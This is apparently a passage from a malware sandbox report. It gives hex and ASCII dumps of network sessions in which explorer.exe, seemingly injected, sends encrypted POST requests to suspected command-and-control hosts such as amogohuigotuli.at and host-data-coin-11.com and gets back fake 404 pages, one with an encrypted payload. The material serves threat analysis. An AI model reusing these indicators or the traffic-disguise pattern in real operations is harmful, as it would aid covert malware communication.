Jan 9, 2022 18:48:48.689450026 CET	15636	IN	Data Raw: ae ae ff d0 d0 d0 ff fa fa fa fb 67 67 67 ff 2a 2a 2a ff 26 26 26 ff 25 25 25 ff 32 32 32 ff 32 32 32 ff 33 33 33 ff 34 34 34 ff 35 35 35 ff 37 37 37 ff 3b 3b 3b ff 40 40 40 ff 47 47 47 ff 4f 4f 4f ff 5a 5a 5a ff 67 67 67 ff 76 76 76 ff 87 87 87 Data Ascii: ggg***&&&%%%222222333444555777;;;@@@GGGOOOZZZgggvvv:::;;;HHH[[[nnn
Jan 9, 2022 18:48:48.689491987 CET	15638	IN	Data Raw: ff 0c 0c 0c ff 0c 0c 0c ff 0d 0d 0d ff 0d 0d 0d ff 0d 0d 0d ff 0d 0d 0d ff 0e 0e 0e ff 0f 0f 0f ff 0f 0f 0f ff 10 10 10 ff 10 10 10 ff 0f 0f 0f ff 0f 0f 0f ff 0f 0f 0f ff 0f 0f 0f ff 0f 0f 0f ff 11 11 11 ff 14 14 14 ff 18 18 18 ff 1f 1f 1f ff 28 Data Ascii: (((BBB
Jan 9, 2022 18:48:48.689529896 CET	15639	IN	Data Raw: 83 83 ff 7a 7a 7a ff 81 81 81 ff 88 88 88 ff ad ad ad ff 52 52 51 ff a7 a7 a7 ff 36 32 87 ff 19 16 7e ff 19 16 60 ff 1b 17 7b ff 1f 1a 9c ff 1c 19 7b ff 1c 18 71 ff 1b 17 57 ff 19 16 4c ff 1f 1a 82 ff 1c 1a 75 ff 19 17 52 ff 1d 1a 79 ff 1c 1a 64 Data Ascii: zzzRRQ62~`{{qWLuRydqqqTTTtttccc<<<yyyVVVKKKxxx&#`{bp
Jan 9, 2022 18:48:48.689567089 CET	15640	IN	Data Raw: ff 0e 0e 0e ff 0e 0e 0e ff 0f 0f 0f ff 10 10 10 ff 10 10 10 ff 11 11 11 ff 12 12 12 ff 13 13 13 ff 14 14 14 ff 15 15 15 ff 16 16 16 ff 18 18 18 ff 35 35 35 ff 69 69 69 ff 4b 4b 4b ff 35 35 35 ff 20 20 20 ff 1f 1f 1f ff 20 20 20 ff 20 20 20 ff 21 Data Ascii: 555iiiKKK555 !!!"""#########%%%&&&!!!YYY
Jan 9, 2022 18:48:48.870445967 CET	15781	IN	Data Raw: 1a 1a ff 1b 1b 1b ff 1b 1b 1b ff 1d 1d 1d ff 42 42 42 ff 94 94 94 ff 4c 4c 4c ff 3f 3f 3f ff 4b 4b 4b ff 52 53 6b ff 42 44 89 ff 5a 5a 74 ff 5f 61 60 ff 56 56 56 ff 67 66 67 ff 6b 6b 6b ff 6e 6e 6e ff 75 75 75 ff 54 54 54 ff 71 71 71 ff a8 a8 a8 Data Ascii: BBBLLL???KKKRSkBDZZt_a`VVVgfgkkknnnuuuTTTqqq{{{<<<///222222333 <<<111:::>>>OPWefv

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
52	192.168.2.3	49866	211.119.84.112	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:50.807234049 CET	17224	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://psidp.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 342 Host: amogohuigotuli.at
Jan 9, 2022 18:48:50.807250023 CET	17224	OUT	Data Raw: 4a 9d 8d c5 4c 64 59 27 59 01 57 56 0f af 22 ba 2c 1b e9 1b f9 1e d7 dc b1 6a a3 80 75 83 a3 95 89 ab 8f c2 7c 44 e1 c5 a3 2e 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a3 19 be 8a 14 62 cc d6 4f 96 86 fa 1e d0 Data Ascii: JLdY'YWV",ju\|D.jp_S61oJf=B!bOu%H\o``/B+GX0[`up}3w~I*5Cn{Z-Awjpmy 1DbW4Mu=,VzL#My7~R1
Jan 9, 2022 18:48:51.553076029 CET	17838	IN	HTTP/1.0 404 Not Found Date: Sun, 09 Jan 2022 17:48:51 GMT Server: Apache/2.4.6 (CentOS) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 327 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
53	192.168.2.3	49867	148.0.74.229	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:51.755096912 CET	17839	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://bveasvok.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 200 Host: amogohuigotuli.at
Jan 9, 2022 18:48:51.755116940 CET	17840	OUT	Data Raw: 4a 9d 8d c5 4c 64 59 27 59 01 57 56 0f af 22 ba 2c 1b e9 1b f9 1e d7 dc b1 6a a3 80 75 83 a3 95 89 ab 8f c2 7c 44 e1 c5 a3 2e 6a 70 89 97 f2 15 92 5f 53 36 31 b0 6f 4a d8 b2 66 87 fe 3d be f5 42 21 9b c6 a2 19 bf 8a 14 62 cd d6 4f 96 9f b3 05 fd Data Ascii: JLdY'YWV",ju\|D.jp_S61oJf=B!bO}(#iS,QU1*dV%K%D)c0i0_I9RxIskqhsG.63-
Jan 9, 2022 18:48:52.342957020 CET	17841	IN	HTTP/1.0 404 Not Found Date: Sun, 09 Jan 2022 17:48:52 GMT Server: Apache/2.4.6 (CentOS) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 00 00 b4 60 fb d4 0e 1a 40 10 16 30 80 b7 2c 78 84 4f ad 7d f5 71 b1 34 b2 96 20 c3 49 91 4a 25 39 57 90 06 64 04 ec 38 49 6b 19 b1 cd e4 dc b5 44 a4 06 4a 38 50 87 d2 d9 c3 3e 08 a2 13 fd 8e e2 e3 07 97 8a 06 9e 8f f1 83 0e 25 a6 79 5e 5c 95 03 0f 2e 0e 4b 69 e1 d9 a0 6a 7d ec 53 2e 3b 76 4b 12 73 36 18 28 a6 70 a3 d1 5f 36 6b 85 29 7c f2 c6 e6 70 95 06 7c 93 74 5d b9 53 68 47 8f 2a f5 3c ea e8 da 25 75 fe b3 89 25 05 7f 55 b6 d9 bc ce 24 6b 9d a5 88 34 b5 5d 90 f0 3e 7f 46 df 7c 6c 4b 1c 0a 91 6e bb 0b 09 5f 29 73 f6 44 bd b1 ab 53 54 30 c2 17 d1 67 97 a4 0c 92 74 cf 37 0c ac 7f 2b e9 6f 87 a1 1a d9 b2 29 14 5f 24 f5 9f bf 6c 13 d9 b4 53 b4 05 33 4f 62 3e 15 21 0b 5a f3 43 93 3a 1a 3e ce 00 a8 83 09 4a d7 07 53 53 fa cb 1f 9e fd 09 51 2a ee 8c 8a 7b 7e 6d f1 ff 78 57 6a db c4 0d 13 13 e3 07 e1 92 24 18 4f c5 03 e1 cd a1 61 7e 9e f5 69 a9 19 17 7e 5d af 9a a0 44 c9 a0 c1 b9 dd 7a 08 90 4e 19 e0 2c 95 a9 18 1a b3 96 be 21 51 61 ba 71 39 7c 8a 28 c8 c8 6b a1 d0 4a 9a 13 fd ec 9e aa 6b ac 87 3f bd 61 0d c0 5d bf 56 34 fd f8 12 6c 33 6c 29 7c 0a 8d 5b aa e2 0e 98 eb 7e 71 eb f0 b0 1a 48 13 4a d8 19 ae cc 4f 3b 79 82 ae 9c 97 02 4c 75 56 ad f3 57 3b 2a b9 72 ee cc 23 32 34 08 31 65 92 90 f7 df f5 ec e7 72 2b 4c 80 d0 12 f9 13 63 11 bb d6 af 31 3c 27 d4 69 b7 9f 93 9a ca 46 99 48 15 ac af eb d9 55 3d af ba 68 92 4e f9 9d 3b 7e 55 40 57 64 7b 39 66 e7 ac 04 28 84 42 40 77 9b c7 9b 84 e7 3d 66 f1 8a 64 b1 33 44 77 29 f8 70 17 4b 51 4c d9 8e 82 11 e8 e4 1f 76 a7 90 4e a5 54 55 a5 8e b7 1b 6f c3 cb 29 32 28 e7 5b 3e 54 ab 7e 08 0f 75 8f b7 af 57 a3 a0 03 85 1f d4 1c 6e 91 9c 09 06 f1 2c 72 a8 03 5b e5 1f e4 a6 7d 10 9f 10 b9 d9 b0 d9 07 99 ca e3 80 1e 00 18 50 6d 43 50 48 b5 8b e1 02 7c d7 9c 9a c3 e0 2b e5 b2 bb 01 7a 17 28 d2 ae 46 1f d0 a1 aa 7a cf f6 6b 23 e3 b8 b0 5a 61 f6 e3 1c bb 22 f5 52 48 a4 7f 96 4d cf e7 17 3f 82 e3 7e 4d a6 70 d4 03 eb ac 98 76 6e 0f ca c2 cf 25 6e b1 e4 bd 9e 56 98 c3 a7 2d 20 ca d4 5f 59 06 43 9c df 03 62 18 58 1b f8 40 aa ae 88 c1 c4 a1 33 25 7d da a9 83 e8 c8 6f cb e2 09 e8 8b 23 1e ac 18 b8 77 b3 0e 93 81 19 13 88 b9 8c f5 18 97 52 b9 c1 ea 9e 13 e8 b8 4c 45 e1 f0 73 8d 43 d9 ed 07 b2 52 dc 1a 9e 8b 18 57 21 01 7d 42 03 81 96 7f d8 2e 27 9d df 3c 42 56 60 de 9e 73 0f b6 65 a2 25 1f 78 60 38 30 5f d6 a6 b8 78 fe b1 8e 98 6d 18 5e 32 d0 e9 f3 32 42 c2 39 16 12 47 0b e9 17 10 8d e3 51 20 b2 3d db 10 54 5a 17 1c 5c 5a 16 b3 19 5f 11 8f 69 f9 e4 39 2a 01 6e f1 fd 58 b3 dc 95 25 1c 90 53 72 5e 15 33 b5 01 82 e3 92 c2 01 6d 7e d3 85 bc 43 cf 76 62 93 45 e1 05 85 d4 9c 97 2e 60 10 3a 93 8b 94 e5 fe d6 ae 32 c8 6e d5 8d 4a ad fb 91 65 69 17 ee f3 af 84 ed 67 e1 a2 3a 84 aa 58 5d 1c 79 9b 37 67 d2 1f ad af ac d5 54 24 d1 e4 dd b2 3a 6a c0 8e ad 90 bb 9a 05 71 77 92 ae 0f 27 d1 9c 65 53 55 cd ab 48 63 36 cc 82 8e 82 a4 9e 9c bf cb b3 f2 fe 92 c6 5a 6b 76 62 8c c9 69 c7 32 a7 90 4e b0 d4 08 d9 4e 2f 18 4b 74 f8 4f b5 24 74 05 f6 6c 1d bf 9d 69 13 23 92 37 88 32 78 7e 66 0b 1b b9 fb 35 51 ed 00 e4 26 0d 72 d7 a2 65 3f 3f 1c f9 e1 f7 66 08 60 f4 ce 89 ca 3b d4 85 08 c7 18 47 64 00 2d ed 07 fc ae 1c 0b 30 63 3d 32 6c 0f 73 f1 c7 00 c4 3d dd 12 e2 d8 28 32 72 91 59 03 d6 c9 f0 a8 8a 7a 2e d3 cd 8c 5f a9 85 10 70 8a a1 76 fe f3 58 a9 62 29 02 3d de b8 d4 5d 9a 44 9a 74 0f 46 24 37 b8 e0 ee a2 47 7f 04 cd ff 62 06 42 97 90 17 a5 8c 43 81 03 5a b5 00 a0 57 a1 fb 1b 57 8f e0 e5 66 6f 78 0e de 88 6b 17 ae 3d 28 39 8a 53 eb 13 66 b5 29 1f 74 82 94 e7 98 6c b2 9f fd 75 6b cc 32 Data Ascii: `@0,xO}q4 IJ%9Wd8IkDJ8P>%y^\.Kij}S.;vKs6(p_6k)\|p\|t]ShG<%u%U$k4]>F\|lKn_)sDST0gt7+o)_$lS3Ob>!ZC:>JSSQ{~mxWj$Oa~i~]DzN,!Qaq9\|(kJk?a]V4l3l)\|[~qHJO;yLuVW;r#241er+Lc1<'iFHU=hN;~U@Wd{9f(B@w=fd3Dw)pKQLvNTUo)2([>T~uWn,r[}PmCPH\|+z(Fzk#Za"RHM?~Mpvn%nV- _YCbX@3%}o#wRLEsCRW!}B.'<BV`se%x`80_xm^22B9GQ =TZ\Z_i9nX%Sr^3m~CvbE.`:2nJeig:X]y7gT$:jqw'eSUHc6Zkvbi2NN/KtO$tli#72x~f5Q&re??f`;Gd-0c=2ls=(2rYz._pvXb)=]DtF$7GbBCZWWfoxk=(9Sf)tluk2
Jan 9, 2022 18:48:52.343014002 CET	17843	IN	Data Raw: 69 eb d4 ea e0 02 63 2f f7 8e d7 e8 dd a7 e3 1e 3c 9a 0f 14 78 02 cf 2f 0c 3a 03 2a fa 6e f1 8c b6 aa 5a 0d 9c b9 2d 59 4f d2 62 9a 62 58 41 3c 37 e1 00 bb 38 8e dd 5d 8b 86 7d 75 59 c6 32 80 18 86 2c 5a 26 3a 2a 20 4d e8 13 25 10 17 ef 3b 54 d7 Data Ascii: ic/<x/:nZ-YObbXA<78]}uY2,Z&: M%;TMemv8A=R;\|[:{jl#!<5;^<<Xomq^q4LAE])5wH0vhfaL@90l)dJ'=_1RU#_X9
Jan 9, 2022 18:48:52.343053102 CET	17844	IN	Data Raw: 5d ae f3 9f b4 be f3 a2 94 36 66 ce e5 14 b5 dd eb 35 47 69 cc 4e fa b7 b0 89 5c 6f e9 64 15 a6 07 dc 64 bd cd de b0 2a cb 3c 87 e2 58 de 05 5a 82 ea 93 fe 43 07 c8 72 57 f7 2b 0f 43 f1 59 b5 c4 f0 50 a6 72 53 cd 73 94 68 80 19 ae 44 1a a8 c6 b9 Data Ascii: ]6f5GiN\odd*<XZCrW+CYPrSshD@l3@m@%s]q<X-V,doV F(-sC=gB.P-C6:7Lu+x8QV='.+R-h8!]Kf19DG&x)`
Jan 9, 2022 18:48:52.343092918 CET	17845	IN	Data Raw: 01 22 f7 68 a4 5e a1 b5 ee 44 31 59 86 b0 75 f9 f3 b5 7a 6b fd f1 cd c4 a9 ef 6f 66 79 38 4a 50 46 e6 0a 2f 42 d4 63 dd 76 d3 db 61 67 27 30 8b ce 6e 6b 9e 92 0c 2e 65 cc 42 c0 9d 53 de 08 c8 77 61 c2 94 d0 b6 9f c3 b8 75 99 6b 94 d2 33 04 c5 41 Data Ascii: "h^D1Yuzkofy8JPF/Bcvag'0nk.eBSwauk3A-%h;O<xVAab`xqLmeSD6A(lC(fLLEgh95kA>.-C7movP>rC_$&gZ=bG"{3.
Jan 9, 2022 18:48:52.505961895 CET	17851	IN	Data Raw: bf 89 c2 40 9f 4a 82 3b 28 58 e2 97 b8 4a 12 af 20 93 2a 1e c4 0b df 90 9b 66 6b 98 92 82 6e c5 de 10 65 19 4b 7b 7f 5b 48 5c 4e 07 69 03 58 d5 44 80 cb b8 a0 a4 65 61 9c 10 41 b3 c2 48 a8 50 8a 1f 67 39 b0 5e 55 59 b7 d2 0d 33 c3 8b 03 db 41 e4 Data Ascii: @J;(XJ *fkneK{[H\NiXDeaAHPg9^UY3A")=J%<FLBdb74gtv{rY)sU6JfaE$K[l3YF< hdS1k>Pu)b{)M>~
Jan 9, 2022 18:48:52.506016970 CET	17852	IN	Data Raw: d9 df 35 35 15 46 9a 49 6b 4f 0e 3b e7 20 0a c2 1b ea 57 f9 a8 02 06 95 93 da 1d 3c 21 f3 e7 f4 0f 56 e3 5e fd fc da c3 98 0e 89 10 fe 62 d2 0d ae b8 10 77 b2 55 d2 20 a7 2e 54 75 1c c1 e3 b3 1f 49 56 6c 3e 8a 16 51 17 1c f9 09 28 ac f3 ec e9 d5 Data Ascii: 55FIkO; W<!V^bwU .TuIVl>Q(OOOZ5!n%1f!4[@r+=uR3)nSl'$3A#Ia{0=M=wI>NY_{k2/89p3;VoJ5dTsB/7
Jan 9, 2022 18:48:52.506057978 CET	17854	IN	Data Raw: 38 39 a6 87 18 aa da cd 1c d1 d0 5b 2c 66 de 18 c6 a1 41 22 1a 09 47 d0 92 1d 5e 60 97 7f 98 38 9d 46 97 57 2a 18 b7 23 39 09 8e bf 0f e1 10 59 09 0e e4 4f 9f 4b 3d 3f f0 a0 8e 1a 8d 35 04 88 db 41 3f cb be 64 de 85 9a a2 86 69 db 16 7a 49 21 60 Data Ascii: 89[,fA"G^`8FW*#9YOK=?5A?dizI!`Y<oS}V; #1@{Y]6/V=r0Tx_yiOFmWyvct,4Qg/!@JB-#z\|.}xik][)
Jan 9, 2022 18:48:52.506747007 CET	17855	IN	Data Raw: 47 db ab 1f 91 42 57 0e 4d 76 7e 0f b6 73 af 36 47 89 65 7c 26 a5 98 10 f9 54 c2 52 67 be ca d9 25 81 d8 30 db 11 2a fa d0 f7 6c f6 da 6f d1 39 86 10 77 bf 95 0e 78 71 f5 3c be 3b df d4 54 63 c6 84 62 8f d3 2b 34 c0 25 4d 79 89 70 72 e5 23 f8 1c Data Ascii: GBWMv~s6Ge\|&TRg%0*lo9wxq<;Tcb+4%Mypr#>zLlTF\w$BY'K!9Pz2w1W\$\|S2W["urC!RZi1N\IETrTB\CJ5/Ei\.3?<F3]t~zeEge7# -
Jan 9, 2022 18:48:52.506788969 CET	17857	IN	Data Raw: 2d 98 34 ae a4 69 98 77 60 c6 4f 9a a7 7a d3 93 f2 6b fa d3 ca 0e 21 be 78 b8 f8 1b 54 23 b8 ac 19 75 ba b8 41 46 16 e2 18 b4 14 e9 99 ed 53 06 b7 c8 8a 2e 3d 3e bc 69 66 25 dd 83 ac 18 85 46 29 e1 80 c5 37 68 b0 73 bc 1c 9c 76 87 7b ca fe dc 6e Data Ascii: -4iw`Ozk!xT#uAFS.=>if%F)7hsv{nx%i0@.TG^u!k?(AUuQaahr?@3P/glzfro>"y@8\|h[42}!smA39
Jan 9, 2022 18:48:52.506827116 CET	17858	IN	Data Raw: 6f 57 26 95 bb 37 0c 17 fb 00 24 b1 ee f1 a2 58 c8 39 22 1d 1e d8 9d b4 be 68 1f 9b 13 d8 12 2b c4 91 24 f6 8b bb 63 0f 46 d3 b9 0c 18 c3 4d be f8 f3 ed a8 d8 19 e9 07 3c 33 d4 4d 37 d7 84 69 54 03 55 fb c3 61 c6 c5 b5 a2 41 00 95 1d 36 87 ba 62 Data Ascii: oW&7$X9"h+$cFM<3M7iTUaA6b`RK0jXYaPx+VW_ipD{Fo4TQql,$%h\_Oy?)4o0\|qb?F#M(_{Y8n<7OIx
Jan 9, 2022 18:48:52.506864071 CET	17859	IN	Data Raw: 72 2e f9 7a a4 e6 94 4e 35 86 a2 58 05 a5 3c 22 7b 66 fe 8a 28 32 f1 16 33 1b 36 7a ea e8 17 15 49 17 2a fc d5 dd 6d 3d a5 42 c2 ff 89 b5 18 b9 98 45 15 71 b0 39 d4 82 ac 84 4c f3 44 6d 37 84 e1 33 75 38 0d 17 28 14 9c ac c9 f1 c8 8b 43 04 70 0b Data Ascii: r.zN5X<"{f(236zI*m=BEq9LDm73u8(CpB?ZH+\|&sI@A-7'.dw<0vV$du$dS(<9?VV$.q/vT\|!Y~#KUa/3-z[L

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
54	192.168.2.3	49869	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:52.557595015 CET	17862	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://qtcvnmqmix.net/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 317 Host: host-data-coin-11.com
Jan 9, 2022 18:48:52.558903933 CET	17862	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 84 de 84 66 5d 02 c9 a1 c1 64 29 c6 a0 0d Data Ascii: i;G~CE5i[nwmFu$f]d)m.Oyb8^!)ul,Y-+3+{2>@@%R4Yh$JM@"=[^6E0G*,ZAY4B51r@we[_U<`D$5
Jan 9, 2022 18:48:53.112940073 CET	18062	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:52 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
55	192.168.2.3	49871	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:53.324094057 CET	19309	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://xvbahlaice.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 117 Host: host-data-coin-11.com
Jan 9, 2022 18:48:53.324480057 CET	19309	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 85 66 5d 02 c8 a1 c1 64 4d 86 b9 23 Data Ascii: i;G~CE5i[nwmFu$f]dM#^xr.p#ts=\34"
Jan 9, 2022 18:48:53.877209902 CET	20866	IN	HTTP/1.1 404 Not Found Server: nginx/1.20.1 Date: Sun, 09 Jan 2022 17:48:53 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close Data Raw: 31 39 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 32 39 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 68 6f 73 74 2d 64 61 74 61 2d 63 6f 69 6e 2d 31 31 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 199<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.29 (Ubuntu) Server at host-data-coin-11.com Port 80</address></body></html>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
56	192.168.2.3	49872	47.251.44.201	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 9, 2022 18:48:54.390929937 CET	20867	OUT	POST / HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://fpwhnxup.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Length: 337 Host: host-data-coin-11.com
Jan 9, 2022 18:48:54.390953064 CET	20868	OUT	Data Raw: 10 87 85 91 69 85 d3 c0 bd 3b 0a 47 7e b8 e4 f2 43 11 a3 45 a2 35 69 e8 cf e6 a8 f7 fa d2 e6 f2 11 b0 5b d4 10 6e cb e2 e8 a9 f3 dd d0 80 11 1f 77 e5 14 88 d5 da fe b7 dc 6d bd d2 e4 d8 46 d4 75 24 f3 c4 85 de 82 66 5d 02 c8 a1 c1 64 5a 85 c2 3a Data Ascii: i;G~CE5i[nwmFu$f]dZ:3f4rpX4 Tb1l:!ZO fxXC 2PLT8ziaWMhz3^;:rMXQAxhp8U(A:=-[{~z,;
